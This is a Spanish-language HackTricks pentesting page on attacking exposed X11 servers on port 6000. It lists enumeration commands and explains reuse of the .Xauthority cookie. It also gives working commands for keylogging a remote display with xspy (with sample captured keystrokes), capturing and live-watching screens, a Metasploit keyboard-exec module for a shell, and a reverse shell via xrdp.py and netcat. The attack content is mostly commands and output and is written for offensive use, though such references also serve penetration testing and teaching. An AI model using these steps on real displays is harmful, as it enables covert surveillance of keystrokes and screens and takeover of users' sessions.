# 6000 - Pentesting X11
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? o ¿quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Únete al servidor de [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para comunicarte con hackers experimentados y cazadores de recompensas por errores!
**Perspectivas de Hacking**\
Interactúa con contenido que profundiza en la emoción y los desafíos del hacking
**Noticias de Hacking en Tiempo Real**\
Mantente al día con el mundo del hacking de ritmo rápido a través de noticias e insights en tiempo real
**Últimos Anuncios**\
Mantente informado con los lanzamientos de nuevas recompensas por errores y actualizaciones críticas de la plataforma
**Únete a nosotros en** [**Discord**](https://discord.com/invite/N3FrSbmwdy) y comienza a colaborar con los mejores hackers hoy mismo!
## Información Básica
El Sistema de Ventanas X (conocido como X) es un sistema de ventanas para pantallas de mapa de bits, común en sistemas operativos basados en UNIX. X proporciona el marco básico para un entorno basado en GUI. X tampoco impone la interfaz de usuario – los programas individuales se encargan de esto.\
De: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
**Puerto predeterminado:** 6000
```
PORT STATE SERVICE
6000/tcp open X11
```
## Enumeración
Verificar **conexión anónima:**
```bash
nmap -sV --script x11-access -p
msf> use auxiliary/scanner/x11/open_x11
```
#### Enumeración Local
El archivo **`.Xauthority`** en la carpeta del usuario se **utiliza** para la **autorización de X11**. Desde [**aquí**](https://stackoverflow.com/a/37367518):
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
> MIT-magic-cookie-1: Genera 128 bits de clave ("cookie"), almacenándola en \~/.Xauthority (o donde apunte la variable de entorno XAUTHORITY). El cliente la envía al servidor sin cifrar. El servidor verifica si tiene una copia de esta "cookie" y, de ser así, se permite la conexión. La clave es generada por DMX.
{% hint style="warning" %}
Para **usar la cookie** debes establecer la variable de entorno: **`export XAUTHORITY=/ruta/a/.Xauthority`**
{% endhint %}
#### Enumeración Local de Sesión
```bash
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
En el ejemplo, `localhost:0` estaba ejecutando xfce4-session.
## Verificar Conexión
```bash
xdpyinfo -display :
xwininfo -root -tree -display : #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
## Keylogging
[xspy](http://tools.kali.org/sniffingspoofing/xspy) para espiar las pulsaciones del teclado.
Ejemplo de Salida:
```
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
## Captura de pantallas
```bash
xwd -root -screen -silent -display > screenshot.xwd
convert screenshot.xwd screenshot.png
```
## Vista de Escritorio Remoto
Camino desde: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
```
./xrdp.py
```
```markdown
Camino desde: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
Primero necesitamos encontrar el ID de la ventana usando xwininfo
```
```
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
**XWatchwin**
Para **visualización en vivo** necesitamos usar
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
## Obtener Shell
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
Otra forma:
**Reverse Shell:** Xrdp también permite tomar un reverse shell a través de Netcat. Escriba el siguiente comando:
**./xrdp.py \ –no-disp**
![](../.gitbook/assets/112217\_0051\_ExploitingX15.jpeg)
Se abrirá un nuevo panel de control donde podemos ver la opción R-shell, que se muestra a continuación:
![](../.gitbook/assets/112217\_0051\_ExploitingX16.jpeg)
Iniciaremos el modo de escucha de Netcat en nuestro sistema local en el puerto 5555, que se muestra a continuación:
![](../.gitbook/assets/112217\_0051\_ExploitingX17.jpeg)
Luego agregue la IP y el puerto y luego seleccione R-Shell, que se muestra a continuación:
![](../.gitbook/assets/112217\_0051\_ExploitingX18.jpeg)
Ahora, como se puede ver a continuación, tenemos acceso completo al sistema:
![](../.gitbook/assets/112217\_0051\_ExploitingX19.jpeg)
{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}
## Shodan
* `port:6000 x11`
¡Únase al servidor de [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para comunicarse con hackers experimentados y cazadores de recompensas por errores!
**Hacking Insights**\
Interactúe con contenido que profundiza en la emoción y los desafíos del hacking.
**Noticias de Hacking en Tiempo Real**\
Manténgase al día con el mundo del hacking de ritmo rápido a través de noticias e insights en tiempo real.
**Últimos Anuncios**\
Manténgase informado con los lanzamientos de nuevas recompensas por errores y actualizaciones cruciales de la plataforma.
**Únase a nosotros en** [**Discord**](https://discord.com/invite/N3FrSbmwdy) y comience a colaborar con los mejores hackers hoy mismo.
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
* ¿Trabaja en una **empresa de ciberseguridad**? ¿Quiere ver su **empresa anunciada en HackTricks**? o ¿quiere tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulte los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos.
* Obtenga el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únase al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígame** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparta sus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).